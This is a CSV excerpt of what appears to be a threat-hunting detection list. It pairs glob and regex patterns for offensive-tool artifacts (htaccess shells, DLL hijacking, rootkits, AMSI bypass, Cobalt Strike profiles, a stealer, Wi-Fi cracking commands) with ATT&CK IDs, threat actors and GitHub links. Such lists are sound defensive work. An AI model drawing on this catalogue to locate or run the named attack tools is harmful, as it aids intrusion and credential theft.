"*mod_php.shell2.htaccess*",".{0,1000}mod_php\.shell2\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52200"
"*mod_php.stealth-shell.htaccess*",".{0,1000}mod_php\.stealth\-shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52201"
"*mod_python.shell.htaccess*",".{0,1000}mod_python\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52202"
"*mod_rivet.shell.htaccess*",".{0,1000}mod_rivet\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52203"
"*mod_ruby.shell.htaccess*",".{0,1000}mod_ruby\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52204"
"*mod_sendmail.rce.htaccess*",".{0,1000}mod_sendmail\.rce\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52205"
"*mod_shellshock.py*",".{0,1000}mod_shellshock\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","52206"
"*mod_wp_enum.py*",".{0,1000}mod_wp_enum\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","52207"
"*modDetective*",".{0,1000}modDetective.{0,1000}","offensive_tool_keyword","modDetective","modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in red team engagements and CTFs in order to pinpoint where escalation and attack vectors may exist. This is especially true in CTFs. in which files associated with the challenges often have a much newer modification date than standard files that exist from install.","T1003 - T1036 - T1057","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/itsKindred/modDetective","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","52208"
"*--mode 3 --type handshake --essid * --verbose -d dicts/* --read *.cap*",".{0,1000}\-\-mode\s3\s\-\-type\shandshake\s\-\-essid\s.{0,1000}\s\-\-verbose\s\-d\sdicts\/.{0,1000}\s\-\-read\s.{0,1000}\.cap.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/hash3liZer/WiFiBroot","1","0","N/A","network exploitation tool","N/A","10","1008","182","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z","52209"
"*--mode 3 --type pmkid --verbose -d dicts/* --read *.txt*",".{0,1000}\-\-mode\s3\s\-\-type\spmkid\s\-\-verbose\s\-d\sdicts\/.{0,1000}\s\-\-read\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/hash3liZer/WiFiBroot","1","0","N/A","network exploitation tool","N/A","10","1008","182","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z","52210"
"*--mode com --acl --csv *",".{0,1000}\-\-mode\scom\s\-\-acl\s\-\-csv\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","52211"
"*--mode com --procmon *",".{0,1000}\-\-mode\scom\s\-\-procmon\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","52212"
"*--mode dll --existing --pml *",".{0,1000}\-\-mode\sdll\s\-\-existing\s\-\-pml\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","52213"
"*--mode dll --procmon *",".{0,1000}\-\-mode\sdll\s\-\-procmon\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","52214"
"*--mode proxy --action prototypes --path *prototypes.csv*",".{0,1000}\-\-mode\sproxy\s\-\-action\sprototypes\s\-\-path\s.{0,1000}prototypes\.csv.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","52215"
"*--mode proxy --dll *.dll*--external-resources*",".{0,1000}\-\-mode\sproxy\s\-\-dll\s.{0,1000}\.dll.{0,1000}\-\-external\-resources.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","52216"
"*--mode proxy --ghidra *--dll *",".{0,1000}\-\-mode\sproxy\s\-\-ghidra\s.{0,1000}\-\-dll\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","52217"
"*MODE=* REMOTE=*sshimpanzee*",".{0,1000}MODE\=.{0,1000}\sREMOTE\=.{0,1000}sshimpanzee.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","52218"
"*ModHideDrv_x64.sys*",".{0,1000}ModHideDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","52219"
"*Modified by: Trevohack aka *SpaceShuttleIO*",".{0,1000}Modified\sby\:\sTrevohack\saka\s.{0,1000}SpaceShuttleIO.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","52220"
"*Modified-Amsi-ScanBuffer-Patch*",".{0,1000}Modified\-Amsi\-ScanBuffer\-Patch.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","52221"
"*ModifiedVulnerableBinaryFormatters\info.txt*",".{0,1000}ModifiedVulnerableBinaryFormatters\\info\.txt.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","52222"
"*Modifiers\CharacterInsertion.psm1*",".{0,1000}Modifiers\\CharacterInsertion\.psm1.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","52223"
"*Modify the selected records of the Windows Event Viewer Log (EVT*",".{0,1000}Modify\sthe\sselected\srecords\sof\sthe\sWindows\sEvent\sViewer\sLog\s\(EVT.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","#content","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","52224"
"*Modify the TP_POOL linked list Flinks and Blinks to point to the malicious task*",".{0,1000}Modify\sthe\sTP_POOL\slinked\slist\sFlinks\sand\sBlinks\sto\spoint\sto\sthe\smalicious\stask.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","N/A","N/A","8","2","115","13","2025-03-29T23:14:47Z","2024-01-24T07:42:08Z","52225"
"*Modifying JuciyPotato by Uknow to support webshell*",".{0,1000}Modifying\sJuciyPotato\sby\sUknow\sto\ssupport\swebshell.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#content","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","52226"
"*Modlishka/config*",".{0,1000}Modlishka\/config.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow.  which allows to transparently proxy multi-domain destination traffic.  both TLS and non-TLS.  over a single domain.  without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/drk1wi/Modlishka","1","1","N/A","network exploitation tool","5","10","4967","897","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z","52227"
"*MODLISHKA_BIN*",".{0,1000}MODLISHKA_BIN.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow.  which allows to transparently proxy multi-domain destination traffic.  both TLS and non-TLS.  over a single domain.  without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/drk1wi/Modlishka","1","0","N/A","network exploitation tool","5","10","4967","897","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z","52228"
"*Modlishka-linux-amd64*",".{0,1000}Modlishka\-linux\-amd64.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow.  which allows to transparently proxy multi-domain destination traffic.  both TLS and non-TLS.  over a single domain.  without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/drk1wi/Modlishka","1","1","#linux","network exploitation tool","5","10","4967","897","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z","52229"
"*Modlishka-windows-*-amd64.exe*",".{0,1000}Modlishka\-windows\-.{0,1000}\-amd64\.exe.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow.  which allows to transparently proxy multi-domain destination traffic.  both TLS and non-TLS.  over a single domain.  without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/drk1wi/Modlishka","1","1","N/A","network exploitation tool","5","10","4967","897","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z","52230"
"*module EvilProxy*",".{0,1000}module\sEvilProxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","52234"
"*module powerup*",".{0,1000}module\spowerup.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","52235"
"*Module to generate shellcode out of raw metasploit shellcode file*",".{0,1000}Module\sto\sgenerate\sshellcode\sout\sof\sraw\smetasploit\sshellcode\sfile.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","52236"
"*MODULE_AUTHOR(""m0nad"")*",".{0,1000}MODULE_AUTHOR\(\""m0nad\""\).{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","52237"
"*MODULE_DESCRIPTION(""LKM rootkit""*",".{0,1000}MODULE_DESCRIPTION\(\""LKM\srootkit\"".{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","52238"
"*MODULE_NAME ""diamorphine""*",".{0,1000}MODULE_NAME\s\""diamorphine\"".{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","52239"
"*modules*daclread.py*",".{0,1000}modules.{0,1000}daclread\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","52240"
"*modules.gtfobins import GTFOBins*",".{0,1000}modules\.gtfobins\simport\sGTFOBins.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","52241"
"*modules.interesting_files import InterestingFiles*",".{0,1000}modules\.interesting_files\simport\sInterestingFiles.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","52242"
"*modules.obfuscate_strings*",".{0,1000}modules\.obfuscate_strings.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","52243"
"*modules.uac_bypass*",".{0,1000}modules\.uac_bypass.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","52244"
"*modules/enumrate.py*",".{0,1000}modules\/enumrate\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","52245"
"*modules/exploits/*.js*",".{0,1000}modules\/exploits\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","52246"
"*modules/exploits/*.rb*",".{0,1000}modules\/exploits\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","52247"
"*modules/nemesis.rb*",".{0,1000}modules\/nemesis\.rb.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52248"
"*Moedx765zilla\\Firedx765efox\\Profedx765iles*",".{0,1000}Moedx765zilla\\\\Firedx765efox\\\\Profedx765iles.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","52249"
"*mojo.5688.8052.183894939787088877##*",".{0,1000}mojo\.5688\.8052\.183894939787088877\#\#.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","pipe name","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","52250"
"*mojo.5688.8052.35780273329370473##*",".{0,1000}mojo\.5688\.8052\.35780273329370473\#\#.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","pipe name","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","52251"
"*mojo_##*",".{0,1000}mojo_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","52252"
"*monero2john.py*",".{0,1000}monero2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","52254"
"*money2john.py*",".{0,1000}money2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","52255"
"*mongodb2john.js*",".{0,1000}mongodb2john\.js.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","52256"
"*Monitor KeyLogger output from a specific agent*",".{0,1000}Monitor\sKeyLogger\soutput\sfrom\sa\sspecific\sagent.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#content","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","52257"
"*Monitor-FBIWantedList -searchName *",".{0,1000}Monitor\-FBIWantedList\s\-searchName\s.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","52258"
"*Monkey Island v*_windows.exe*",".{0,1000}Monkey\sIsland\sv.{0,1000}_windows\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","0","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52260"
"*monkey*tunnel.py*",".{0,1000}monkey.{0,1000}tunnel\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52261"
